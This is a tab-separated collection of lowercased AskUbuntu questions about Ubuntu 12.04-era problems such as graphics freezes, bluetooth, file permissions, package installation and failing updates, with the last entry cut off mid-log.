140966	freezes in 12.04 and graphics hangs	i 'm having regular ( several times a day ) complete machine freezes in 12.04 that i was n't experiencing in natty . ca n't move mouse or ssh in , sound goes into a short loop . on a possibly-related note , i also regularly get notifications that i 've had a system error ( which is what sent me here ) , saying that there was a problem with my graphics driver . in syslog i see things like : may 21 20:07:05 blam kernel : [ 52.938651 ] [ drm : i915_hangcheck_elapsed ] error hangcheck timer elapsed ... gpu hung may 21 20:07:05 blam kernel : [ 52.938655 ] [ drm ] capturing error event ; look for more information in /debug/dri/0/i915_error_state may 21 20:07:05 blam kernel : [ 52.941793 ] [ drm : i915_wait_request ] error i915_wait_request returns -11 ( awaiting 1714550 at 1714548 , next 1716521 ) may 21 20:07:21 blam kernel : [ 68.558597 ] [ drm : i915_hangcheck_elapsed ] error hangcheck timer elapsed ... gpu hung any hints on debugging this or advice on what to do would be appreciated . running on an ivy bridge machine ( i7-3770k ) , integrated graphics . edit : also , after the system completely freezes , i do n't have any error messages or any indication of what the problem was , even after trying to sysrq while it was frozen .
140969	why does music start playing when i log in ?	when i login i suddenly start to hear music . i have n't configured anything to do this . as i start to do things the music stops . what causes this ?
140971	how can i get the macos green + button function in ubuntu ?	is there a way to get que macos zoom button ( the one called `` + '' in green color ) fuction in ubuntu windows ? not to maximize windows , just to `` optimize '' them like in macos ? here a video showing it function http : //www.youtube.com/watch ? v=ujobdugitvi it is supossed to change a windows size to the optimum
140975	how do i apply an indian language system-wide ?	i want to add indian languages system wide.i see on english and chinese options .i also updated font cache . the image says it all . first is the gnome tweak tool and second the font viewer . how do i render them and apply system wide ... ? ( i am not speaking of keyboard layout . i want the windows and its contents to be in indian language . )
140976	removing windows xp while having ubuntu	how does one delete or remove windows xp from the hard drive while using ubuntu and not re-installing ubuntu again ?
140977	how to get username back on the unity panel ?	installed kdm and used it as default . after i login into unity through i do not see my username.but if i go back to using lightdm , i have no problems . anyone knows how to use kdm as default and still not lose username in unity.. ?
140978	psensor physical id 0	psensor ( i am using it to check my cpu/hdd temp ) is showing physical id 0 at 50 deg c , i want to know what is physical id 0 ? does that mean it 's showing the temperature of the installed ram module or something else ? sensor information id : lmsensor coretemp-isa-0000 physical id 0 . btw i am using linux kernel 3.4 i would also like to know if the temperature is normal or overheated ? thanks in advance .
140981	changing default directory in quickly	i 'm unhappy with the fact that quickly creates all my new projects in my home directory . i figured it would be something in create.py in the template 's folder , but i 'm new enough to python and quickly that i ca n't figure it out . i 'm sure this is an easy answer , how do i change the directory where quickly creates new folders ?
140986	cant verify checksum for downloaded lts 12.04 iso and ca n't verify burn either	i tried to verify my download checksum in mac 's disk utility but it could n't find a checksum to verify.also tried to burn iso at slowest speed and still it could n't verify the burn . any other hints to verify download or get a clean burn ?
140993	eclipse disappearing from unity / alt-tab in 12.04	eclipse is randomly disappearing from the left panel and from alt-tab after a few minutes of use for me in 12.04 . it 's definitely still there ; if i minimize whatever window i have on top of it , i can get back to it ... but that 's the only way . if i minimize it , i 'm doomed and have no way to get the window back . any idea on how to fix this ? alternatively , any idea of a workaround ( e.g . some way to either re-raise the window from the commandline , or force unity/alt-tab to pick it back up ) ?
140998	compiling source into a deb package	i have always had a problem installing and removing compiled software , so i have decided i would like to build software from source into a .deb package for easier installation/removal . i would like to know of an easy and short way to build source into a .deb package , as an end user . i have tried : ubucompilator , which did not work for me this how to guide , but i found it too long
141002	bluetooth not working in kubuntu	i have installed kubuntu 12.04 x64 bit tomorrow on my laptop . all seems to run fine but the bluetooth is not ! it says no adapter found . it worked great in ubuntu 11.10 . how can i fix this ? let me know if you need additional details .
141009	how to enable the `` other user '' login in ubuntu 12.04 if the userid i want to use is n't listed on the login screen ?	how can i enable the `` other user '' option for the login manager in ubuntu 12.04 ? this was available in older versions of ubuntu for use in logging in with a user-id other than those listed on the login manager .
141011	unity - customize keys ( f10 , alt+s )	is it possible to customize the default keys like f10 to not use a window control ? i am a happy midnight commander user and would like to be able to quit within mc and not have the window manager take over that key . i already found out how to disable alt+s to find files . disable alt+s by clicking edit- > keyboard shortcuts and uncheck `` enable menu access keys ( ... ) '' i tried ( in the same dialog ) to uncheck `` enable the menu shortcut key ( f10 by default ) '' but when i press f10 in that same window it comes up with the option to quit as well as a context menu from the window , which is an annoyance . i like unity so far but there are a few gotchas like this where i still prefer gnome shell .
141012	how to install solfege and make it work	i need to install solfege for study , and it needs mma and other complements and i do n't know install it . please help me
141013	xfs or ext4 on external hard drive	i have an external hard drive on which i want to make a backup of my files . which file system between xfs and ext4 will be the fastest to write data on the hard drive ?
141014	the ' $ ' command outputs `` command not found ''	the ' $ ' command gives the result and then outputs `` command not found '' in the terminal ?
141015	install desktop environments or use different distributions	for you that have tested this , should we use ubuntu and install different desktop environments ( kde/xfce ... ) or we should install different distributions ( kubuntu/xubuntu ... ) . are there any notable issues in performance / cpu consumption ? ps : i know how to install them ( already did ) , i wanted to know if anyone has any problems regarding the performance and what is better to install the desktop or to use the ditribution
141027	bridged networking in kvm	i 'm using ubuntu 10.04 with qemu-kvm installed . i bridged my eth0 to br0 . my problem is that the host os loses connection . here is my interfaces file auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto br0 iface br0 inet dhcp bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0
141038	ata1.00 : failed to enable aa error	after i installed ntfs-config im getting `` ata1.00 : failed to enable aa error '' on startup 2 times and my ubuntu or the unity interface its all messy , the screen keeps blinking and failing . uninstalled the ntfs-config app but the errors remains . how could i fix that ? searchd all over google but no answer any help would be appreciated thx in advice obs : im using 12.04 in a i5 processor with intel hd 3000 , only one hard disk with 3 ntfs partitons ( 1 windows , 1 data , 1 windows-sided ) found this on the logs but its greek to me may 23 06:03:05 kieling-note kernel : [ 1.130039 ] ata1 : sata max udma/133 abar m2048 @ 0xd0608000 port 0xd0608100 irq 40 may 23 06:03:05 kieling-note kernel : [ 1.130041 ] ata2 : dummy may 23 06:03:05 kieling-note kernel : [ 1.130044 ] ata3 : sata max udma/133 abar m2048 @ 0xd0608000 port 0xd0608200 irq 40 may 23 06:03:05 kieling-note kernel : [ 1.130046 ] ata4 : dummy may 23 06:03:05 kieling-note kernel : [ 1.130047 ] ata5 : dummy may 23 06:03:05 kieling-note kernel : [ 1.130048 ] ata6 : dummy may 23 06:03:05 kieling-note kernel : [ 1.243864 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input4 may 23 06:03:05 kieling-note kernel : [ 1.449177 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) may 23 06:03:05 kieling-note kernel : [ 1.455764 ] ata1.00 : failed to enable aa ( error_mask=0x1 ) may 23 06:03:05 kieling-note kernel : [ 1.455787 ] ata1.00 : ata-8 : samsung hm501ii , 2aj10003 , max udma/100 may 23 06:03:05 kieling-note kernel : [ 1.455789 ] ata1.00 : 976773168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) may 23 06:03:05 kieling-note kernel : [ 1.457155 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd may 23 06:03:05 kieling-note kernel : [ 1.462475 ] ata1.00 : failed to enable aa ( error_mask=0x1 ) may 23 06:03:05 kieling-note kernel : [ 1.462497 ] ata1.00 : configured for udma/100 may 23 06:03:05 kieling-note kernel : [ 1.469417 ] scsi 0:0:0:0 : direct-access ata samsung hm501ii 2aj1 pq : 0 ansi : 5 may 23 06:03:05 kieling-note kernel : [ 1.469553 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 may 23 06:03:05 kieling-note kernel : [ 1.469596 ] sd 0:0:0:0 : [ sda ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) may 23 06:03:05 kieling-note kernel : [ 1.469656 ] sd 0:0:0:0 : [ sda ] write protect is off may 23 06:03:05 kieling-note kernel : [ 1.469660 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 may 23 06:03:05 kieling-note kernel : [ 1.469781 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua
141040	xfce , thunar : how to get file path in title bar ?	i understand that this feature is not yet available ( https : //bugzilla.xfce.org/show_bug.cgi ? id=5920 ) but is there a workaround for getting thunar to display a file 's path in the title bar ( like in the terminal emulator for example ) ?
141041	cntlm works for http but not https	i have installed and configured cntlm on a fresh ubuntu 12.04 64-bit build ( running in virtualbox ) . the network proxy setting is pointing to cntlm ( localhost:3128 ) for both http and https proxies . through firefox , http urls work , but https urls are perpetually stuck trying to connect . what 's the deal ?
141045	distorted text in programs	i 've installed ubuntu 11 with gnome and in some point the text in the programs becomes unreadable like this . it 's not only the text , but even the desktop background looks awful . i 've tried to add section in xorg.conf , but it did n't helped out . section `` device '' identifier `` g33/x3000 '' driver `` intel '' busid `` pci:0:2:0 '' option `` modedebug '' `` on '' option `` monitorlayout '' `` lcd , vga '' option `` devicepresence '' `` true '' endsection and this is what the lshw returns about the vga *-display description : vga compatible controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : dfe00000-dfe7ffff ioport:8800 ( size=8 ) memory : e0000000-efffffff memory : dfe80000-d $
141048	how to install and use mib files ?	i 've run sudo download-mibs and downloaded two additional mib files ( informant-os-mib , wtcs-mib ) : $ ls -la /var/lib/mibs/site total 456 -rw-r -- r -- 1 root root 460726 2012-05-22 16:52 informant-os-mib -rw-r -- r -- 1 root root 1088 2012-05-23 08:55 wtcs-mib and created a symlink in the standard mib directory : $ ls -la /usr/share/mibs/site lrwxrwxrwx 1 root root 18 2012-05-23 08:58 /usr/share/mibs/site - > /var/lib/mibs/site but it 's not able to translate this oid : $ snmptranslate -of 1.3.6.1.4.1.9600.1.22.11.1.1.19 .iso.org.dod.internet.private.enterprises.9600.1.22.11.1.1.19
141053	will my windows os be kept if i install ubuntu	i use windows 8 consumer preview , and since it is going to expire , i wondered if i can keep windows 8 when i install ubuntu or not , because i want to still use windows 8 as well as ubuntu . thank you !
141069	how can i install cinnamon on a minimal cli installation ?	i 've come across similar , already answered questions on this website ; however none of them deals with starting from the scratch - the ubuntu core . the normal release of 12.04 was not responding well on my old pc . thus , i decided to install `` non-pae ubuntu core using '' mini.iso . now , i am having the ubuntu core installed which swiftly boots into the terminal cli . however i want to install a gui onto this . i do n't want to do apt-get install ubuntu-desktop since that comes with unity , which i hate like anything . there are ways to install mate and cinnamon available here , however they are valid only if some other gui is already present . but , i want to install them when no gui is initially present - right from the core . in a nutshell : i am looking how to install `` cinnamon '' right from the scratch ( ubuntu core cli ) , so that the system directly boots into cinnamon login screen . on my other system i would also like to do the same but use mate instead of cinnamon .
141071	how to prevent radiotray from playing ( from buffer ) on lock screen after resuming	when i resume my laptop and had radiotray turned on it starts playing again ( from buffer ) while i 'm on the lock screen . this gets really annoying when i 'm somewhere it should be quiet ( library , train etc. ) . it would also be nice to have some delay in resuming radiotray playback after unlocking the screen to be able to react to the situation i 'm in . how do i prevent that behaviour ( ok , besides turning radiotray off before suspending ) ?
141073	installation of openjdk 7	i am installing openjdk-7 on my ubuntu 10.04 server but i find it to be difficult . i am new to ubuntu . i have installed the python software properties as suggested by some advice i saw online and have uncommented these two lines : deb http : //archive.canonical.com/ubuntu oneiric partner deb-src http : //archive.canonical.com/ubuntu oneiric partner0 also i have done these two successfully : sudo add-apt-repository ppa : openjdk/ppa apt-get update apt-get install openjdk-7 is not working as i expect .
141075	excessive hard disk activity	i am having problems on ubuntu 12.04 x64 `` fresh '' installed on ext4 partition on primary hdd . when not in use every 5 to 10 seconds hdd is active for about 10 seconds an writing no mater what application is turned on or running . i used iotop and found that jbd2 is constantly writing to the hdd . the noise of the hdd is driving me crazy , at this rate disk will not last long . on the same hdd i have windows 7 ( dual boot grub2 ) and everything works ok , the disk is turned off when not in use , and the computer is silent . everything else is working fine ( just little problems with skype and the webcam , but that is tolerable ) , but fear from losing disk and noise is untolerable since i have computer turned on for 10 hours a day ... i tried manually to lower the frequency of journalling , but no solution found on web helped me so far , disk is grinding at same rate . any solution of this problem ? if not i think i will stop using ubuntu , no hdd will last long at this rate of use and the noise from hdd is not tolerable ...
141079	unable to use `` embed pdf & eps ( experimental ) '' option in scribus 1.4.1	i am planning to use scribus for the preparation of scientific posters . i especially like the latex frame option that scribus has , which let 's me use latex directly in the poster . however , when i export my poster to pdf , the latex fonts look less sharp than the other parts of the document that are typed directly into scribus text boxes . i have read in sevaral places that the option to use to get really sharp latex output is `` embed pdf & eps ( experimental '' from the pdf export page . however , that check-box is greyed out for me . i then read that you need podofo to get this option . however , as far as i can tell , i already have podofo among my packages ( writing sudo apt-get remove libpodofo0 . and using tab completion yields libpodofo0.8.0 libpodofo0.9.0 ) . furthermore , sudo apt-get install libpodofo does nothing , the option is still greyed out . does anyone have any suggestion for me ?
141087	find file by content - simple gui-based solution	i 'm looking for a gui way to search for a textfile file by content on ubuntu precise/gnome 3 ( i.e . find all `` *.rb '' files which contain the word `` script '' in `` ~/documents '' and subdirectories ) . i know i can use grep , but i 'm looking for a simple gui solution . if possible no tools that have their own daemons and/or build huge indexes in advance - a simple , iterative , on-demand search would be the best .
141089	whats the best cheapest tv tuner for ubuntu ?	my family are switching from cable to having a htpc . im going to buy them a zotac itx computer with a 520m in it . i have found this cheap tv tuner that i have read works with linux : http : //www.ebay.co.uk/itm/disgo-freeview-digital-tv-tuner-usb-dongle-stick-receiver-dvb-dvb-t-/250949179221 ? pt=uk_computing_video_capture_tv_tuner_cards & hash=item3a6dbc9755 # ht_1454wt_1134 will this record on one channel while i record on another ? is mythtv any good ? if you have any other good suggestions for a tv stick ( it has to be usb as the machine im buying wont have any pci ports ) for under âł30 then that would be great ! sorry if this seems a clone question but it is different to all of the others that sound the same . we will be using this htpc for some 1080p youtube videos . specs : 2gb ddr3 ramnvidia 520m 500gb hdd ( big enough for us ) dual core 2.00 64bit atom
141095	unable to boot normally	i was using gnome classic and was working fine . i changed to xbmc and rebooted . ever since i get a blank screen and am not having any luck to switch back to gnome classic either . please help
141101	monospace font is not mono spaced in eclipse , why ?	i recently upgraded to ubuntu 12.04 , and i see that when using eclipse for editing source code , the bold characters displayed with the monospace font are actually thicker than the non-bold ones . thus , the monospace font is actually not mono-space . ( same space for all characters ) is this a known issue ? am i missing something ? how do i make it mono-space again ?
141102	firefox unresponsive script after wake-up/resume	firefox is often unresponsive after waking up/resuming from hibernate/suspend on ubuntu 12.04 . after a while it will give me an error saying that some script is unresponsive and i get the choice to 'stop ' it or 'continue ' running it : a script on this page may be busy , or it may have stopped responding . you can stop the script now , or you can continue to see if the script will complete . i guess that firefox does n't like active scripts to be interrupted by hibernate/suspend , and thus freezes once i wake-up/resume my laptop . how do i resolve this , in order to make firefox wake-up happy and snappy again ?
141105	change menu item shortcut key like i used to be able to	in 10.04 i had my system set up so that i could hover my mouse over a menu item and type a shortcut and that would be the shortcut for that item . to do this i had enabled /desktop/gnome/interface/can_change_accels in the gconf-editor . however , after upgrading to 12.04 this seems to have disappeared . the item is still there in gconf but it seems to have to effect . i would really like this to work because it is a really neat trick that make my life so much easier . cheers .
141106	how do i delete a node from maas after removing it from cobbler ?	i 've installed ubuntu maas server , and a couple of nodes . everything went right , just for one node , now with status `` allocated to ... '' . question is , how do i delete this node . i 've tried following : cobbler system remove -- name=xxx the node seems to be removed ( cobbler system list ) but is still visible in /maas webui , even after several reboots . any hint ?
141107	did orchestra evolve into maas ?	i never knew what orchestra really was , i 'd like to ask , maas is orchestra with another name ? , if not , what are the differences ?
141108	how to install ubuntu os having already installed windows os	i am a user of windows os . recently i came to know about free os and many other utilities offered by ubuntu . i have downloaded ubuntu iso file and windows installer and saved on my usb stick . now what to do ahead . please guide
141109	choosing a kernel type for arithmetic calculations	from this wiki page https : //help.ubuntu.com/community/ubuntustudio/realtimekernel i see many type of linux kernel available for the ubuntu distro . i use a lot of computation programs which use many arithmetic calculations . which type do you think is the most performant in my case ? i have an intel i7 processor and an ubuntu 12.04 x64 .
141110	fn key is not functioning on samsung np-rv513 laptop	i can not adjust brightness , sound etc.. using fn key in my samsung np-rv513 laptop . i am using ubuntu 12.04 32bit as a dual boot with windows 7.processor : amd dual core processor e-350 ( 1.6ghz , 1mb ) chipset : amd a50m fch . please help me to find a solution
141115	how can i install bleachbit in ubuntu 12.04 lts ?	i 'm unable to install bleachbit on my laptop running ubuntu 12.04 . the ubuntu software centre shows that the package is available from the universe software source and i have the option to `` use this source '' but after that , it gets stuck while quering software sources . how can i fix this problem ? it 's occurred to me that perhaps this could be from software sources being deleted in my configuration . if so , can someone tell me the default list of software sources ? plz help me out and sorry for my poor english
141119	what is the equivalent terminal command of update manager ?	i have always been running the following command to update via terminal my machines : sudo apt-get update & & sudo apt-get upgrade -y but the other day , right after having finished installing some updates , the update manager popped up asking me to install some updates . i was puzzled as i have always thought the two were equivalent . i tried running the terminal command again : no updates . then tried pressing the `` check '' button on update manager : again some updates were available . my conclusion is that the command above is not equivalent to the update manager , as i have always thought . so , what is the true equivalent terminal command of update manager ?
141121	is there a php 5.3.x ppa for 10.04 ?	i currently have an openvz vps system running 10.04lts , which i need a newer build of php 5.3 on . this is because i use php-fpm for all the virtual sites it hosts , and the lucid build does n't include this feature . i was previously using a ppa provided by the nginx packaging team but they 've recently discontinued it which leaves me with an old , buggy , vulnerable version of php . are there any php 5.3.x ppas which are still kept up to date ? by searching launchpad i 've found several with version 5.3.5 but this is also terribly old , and i 've found brian mercer 's ppa but the description says that will be disappearing soon as he no longer needs to maintain it for himself . so are there any ppas which offer up a backported/upstream version of php 5.3.x ( i.e . 5.3.13 which is current ) including the php-fpm setup ? cheers ! edit - i should further explain that as this is openvz and the vps provider do n't yet provide a 12.04 template , i ca n't upgrade to 12.04lts , at least not yet . so while this might be a long-term option , it 's not an answer to my immediate question : )
141127	inheritable chmod permission from parent directory	i have a directory named cache in /var/www , where i need to provide permission in following way : sudo chmod -r 777 cache but that 's not enough because php script automatically creates sub-directories under that for better file management like a , b , c ... and so on . now here whenever any new directory gets created it does not inherit permission from parent directory `` cache '' instead it stays with drwxr-xr-x access instead of drwxrwxrwx . can anyone help ?
141130	restrict acces to my home folder from another standard user account	i have made a new user on my machine to be used by my family . but when i loged in in the family account which is not an administrative account , i could acces my home folder ( which is an administrative account ) . i want to restrict the access to my home folder from the new standard user ... how do i do this ? ? and i would also like to restrict that user from using the other ntfs partitions i have . in short that account should have acces only to its own home folder and not to my home folder or to any ntfs partition present .
141139	how to restrict access to a ntfs partition to a standard ( non-admin ) user ?	i am using ubuntu 12.04 . i have 4 ntfs partitions . i have made 2 users : one for myself ( admin ) and one for family ( standard/non-admin ) . i successfully restricted the access to my home folder from this standard user . now i want to restrict it from accessing all my ntfs partitions . how can i do this ? i checked restrict access from another user to the ntfs partition but though the answer is accepted it does n't seem to have helped that op either as seen in the comments later .
141144	why battery icon on ubuntu-mono themes is broken ?	battery icon on ubuntu-mono-dark theme did n't show up correctly :
141149	can i switch between desktop environments using terminal ?	i 've installed gnome desktop on kubuntu 12.04 . but my speed of clicking take me to select gnome as default desktop . is there a way to switch from gnome to kde using terminal . i tried to google it but nothing helped me to resolve my problem .
141150	is it possible to use overlay scrollbars in lubuntu ?	is it possible to install overlay scrollbars in lubuntu ? i searched for hours , but found nothing . i 'm using lubuntu 12.04 .
141151	installing swftools in 11.10	i downloaded the deb , following the answer in this question : how can i get swftools installed ? when i run : wget http : //launchpadlibrarian.net/27270379/swftools_0.9.0-0ubuntu1_i386.deb sudo dpkg -- install swftools_0.9.0-0ubuntu1_i386.deb i get : the following packages have unmet dependencies : swftools : i386 : depends : libgif4 : i386 ( > = 4.1.6 ) but it is not going to be installed depends : gsfonts : i386 but it is not installable i tried calling sudo apt-get -f install which removed the manually installed package , and then installed libgif4 and gsfonts using apt-get , however libgif4 seems to be the wrong version ( i 'm thinking 4.1.9 as it 's the latest ) , and i ca n't for the life of me figure out how to get it to install version 4.1.6 . and as far as i can tell gsfonts is installed , i 'm not sure why i 'm getting that error message . what should i do ? i need to batch convert 92 animated gif images to web-optimised swf , and i was planning on doing this using gif2swf .
141158	bluetooth not really `` turning on '' on a sony vaio vpceg	on a sony vaio vpceg , bluetooth is not working properly : the gnome-shell bluetooth indicator ( at the main bar ) shows the bluetooth is on , but when i try to switch visibility on it simply does n't turn on . when i open the bluetooth configuration dialog , the on/off indicator shows me the bluetooth is off . and when i try to turn it on it simply does not turn on . the following is outputted by lsusb command : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 0c45:64be microdia bus 001 device 004 : id 0489 : e027 foxconn / hon hai bus 002 device 014 : id 4971 : ce22 simpletech ====== update : output from rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : sony-wifi : wireless lan soft blocked : no hard blocked : no 2 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no what should i do to really activate the bluetooth ?
141162	how can i enable microphone mute button on thinkpad w520 ?	i 'm using ubuntu 12.04 . i 've read enabling mic mute button and light on lenovo thinkpads but the acpi_listen does n't produce any output in the terminal ( for any of the media buttons , even the working ones ) and xev does n't output anything for this mic mute button .
141164	plymouth boot screen not showing after enabling nvidia drivers	i 'm running ubuntu 12.04 with wubi , when i first installed ubuntu i could see the splash screen with the blinking dots , but after a couple of days it vanished ( i 've nvidia drivers installed ) . i searched around and found this enabling nvidia driver messes up splash screen will it be safe to edit grub as stated there ( in wubi installation ) ? , and will it work for 12.04 ?
141165	how do i install only chrome on a minimal installation ?	it 's something like chromium-os , however even more minimal . i was thinking , if it is possible at all ? ? ? that i use an ubuntu 12.04 minimal , just to install the base os , and then on top of it only the chromium browser , without any gui like gnome , kde , etc . if this is not possible , then is it possible to browse the internet directly through the terminal which comes immediately after installing the base minimal os . i do n't want to install anything except for a gui browser ( not the text browser ) .
141166	damaged swap partition - how and what to do ?	i needed gparted to format a microsd card ( do n't trust disk utility too much as more problems seem to occur with hard drives and memory cards i formatted with it , than with the ones i formatted wth gparted ) , and almost got a heart attack ... there 's a damaged partition on my new hard drive ( a bit more than 2 months old ) ! luckily it was only my swap partition , but still ... i 'd like to know a few things ... how to rule out the possibility of hardware failure . how this can happen if the problem 's not hardware-related . i only installed linux once on this computer ( waited for ubuntu 12.04 to get released ) , so it 's not a swap partition that remains from an earlier installation . what can be the cause of physical hard drive damage . the computer has n't fallen of a desk or anything ... how to prevent this in future , if at all possible . additional : whether it 's normal that reading ( and writing as well , i think ) speed drops significantly over a minute time ; and if it 's not , what are some possible ways to analyse/fix the issue ? no problem if you ca n't answer all of my questions . information it 's a read-only benchmark . the partition labeled windows holds a windows 7 installation i 'm supposed to need some time for school , and i used before ubuntu 12.04 got released . i have booted it up a few times after ubuntu 12.04 was installed ( i do n't know whether windows ' disk check can do any harm to linux partitions , but it always seems to run a checkdisk after i changed my partition table layout with a linux application like gparted ) ./dev/sda7 is the swap partition i 'm talking about . i guess my best option now is just try to boot a live cd and format /dev/sda7 again ? it wo n't format it from my installed ubuntu system .
141168	ad hoc : sharing a wifi connection in use ?	say my laptop is connected to a wifi hotspot . is it possible to simultaneously create an ad-hoc network for that same laptop , so i can connect my phone to my laptop instead of directly to the wifi hotspot ? the wifi reciever in my laptop is much stronger than in my phone , that 's why i 'd like to see if this is possible .
141171	garbled text on 12.04 live cd during installation on lenovo z570	i just recently bought a lenovo z570 , and for some reason the livecd has garbled text . i tried using ubuntu 12.04 ( amd64 ) desktop/livecd ( cd version ) . the text appears straight after trying to boot the cd , and it appears to not be rendering to the screen correctly . possibly a graphics issue , since the laptop contains both an nvidia and an intel card that is swappable with a soft-hardware switch , and in the uefi/bios . note : using the switch , and changing the uefi/bios option did n't help . tried booting from usb , with no joy ... but this could be because one of two things : either a ) the configuration used for the bootable usb drive i have* ; or b ) the fact that the lenovo z570 has an ( u ) efi bios , and this bootable usb was created ( tested and working ) on a regular bios ( legacy ) system . please look at the information i 've provided below . i would like to know if it is possible to install ubuntu to my system ? why am i getting garbled text and how can i proceed ? are there any specific changes i need to do ? if it helps , this is what i know about the laptop : contains a ( u ) efi instead of a legacy bios . this is based on information found on the internet ( e.g . lenovo forum ) . contains 4 partitons : 200mb ( ntfs , system , active , primary ) , 654.69gb ( ntfs , boot , page file , crash dump , primary , contains windows 7 ) , 29gb ( ntfs , logical , contains drivers/oem apps , label : lenovo ) , 14.75gb ( unknown filesystem , oem partition , used for onekey recovery ) . windows 7 home premium 64-bit ( oem ) is preloaded . despite using ( u ) efi , windows is preloaded in legacy mode ! this is checked using a tool called `` bcdedit '' in windows 7 which results in the `` windows boot loader '' saying the path is `` \windows\system32\winload.exe '' , this should show `` winload.efi '' if it was booted in efi mode . the hdd is partitioned using mbr instead of gpt . some of the specs . : intel core i7-2670qm ( 2.20ghz ) intel hd graphics 3000 nvidia geforce gt 540m cuda/optimus configuration graphics . 750gb hdd 6gb ram side note : i have a feeling the cuda/optimus configuration is where the problem lies , however i must point out that i did change this in the ( u ) efi/bios/cmos from optimus to uma ( or the internal intel graphics card ) . neither way allows me to boot the cd without the garbled text . *configuration of the bootable usb drive : - ext3 filesystem . - bunch of ubuntu iso files ( i.e . 10.04 to 12.04 , both i386 and amd64 ) in a subdirectory called `` iso '' . this is so i can install it anywhere , anytime , or to use as a liveusb on any machine for diagnostics , tweaks or fixes . - grub2 bootloader . - chain-loading the iso files ( or iso loopback ) . - grub.cfg manually configured each time a new iso is added .
141174	adding space to vmware virtual disk for running ubuntu server guest on lvm partition	i have been testing methods for adding space to an ubuntu server guest running on vmware . i have setup the server using lvm so i can add physical disks to to the lvm group and expand the logical volume on the system without having to shut it down . what i am testing right now and having trouble with is rather than adding a second virtual disk , i extended the existing virtual disk using the vmware client and it appears that it worked , but i can not figure out how to get ubuntu server to recognize the additional space without a reboot . i have tried rescanning the scsi hosts using the command below as i would in order to add the 2nd virtual hard disk , but that does n't appear to do anything . command to scan for added hard drive : echo `` - - - '' > /sys/class/scsi_host/host2/scan any ideas ? i am trying to figure out if this is possible so i do n't have to keep adding multiple virtual hard drives every time i need more space and instead just make the existing drive bigger . thanks in advance for any help !
141181	server 12.04 wo n't update any more	i am on a shallow ( linux newbie ) learning curve slowly configuring server 12.04 on a new microserver and have been updating successfully each time there has been a notification . yesterday 's update group of 9 updates including 5 security updates went haywire midstream updating after my downloading and allowing the semi-auto-update . i eventually got back to a command prompt and re-booted to find that it was still reporting that the 9 updates were still required . i again tried to update with similar results , the exception being that the number had grown to 10 updates and these were obviously going through the motions to `` done '' , but upon further power-down restart , the updates were still announcing the need to be installed . nothing has changed since the last successful update . how might i dig my way out of this , please ?
141184	where is the gnome-power-manager binary in 12.04 ?	using a tiling window manager , i called gnome-power-manager in earlier ubuntu versions to get the battery tray icon . in 12.04 , the gnome-power-manager package is still there , but the binary is gone . what is the 12.04 equivalent that starts the applet ?
141190	xubuntu 12.04 ui glitches	i 'm having some strange problems with thunderbird and chrome in xubuntu 12.04 xfce 4.10 ( installed from ppa ) . some ui elements from both windows sometimes are drawn on each other , no matter which window is active at the moment . not sure what i should do - report a bug to xfce , or thunderbird , or chrome ? other ideas ?
141194	auto update not working	when i get new updates , i ca n't install them . when i try to install i get the following error message . installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 191976 files and directories currently installed . ) preparing to replace resolvconf 1.63ubuntu11 ( using ... /resolvconf_1.63ubuntu14_all.deb ) ... unpacking replacement resolvconf ... preparing to replace libutouch-geis1 2.2.9-0ubuntu2 ( using ... /libutouch-geis1_2.2.9-0ubuntu3_i386.deb ) ... unpacking replacement libutouch-geis1 ... preparing to replace vino 3.4.1-0ubuntu1 ( using ... /vino_3.4.2-0ubuntu1_i386.deb ) ... unpacking replacement vino ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... processing triggers for gconf2 ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for libglib2.0-0 ... setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-05-23 19:40:37 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 223.224.12.144 , 223.224.12.146 connecting to download.oracle.com ( download.oracle.com ) |223.224.12.144|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-05-23 19:40:38 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 173.223.2.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |173.223.2.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 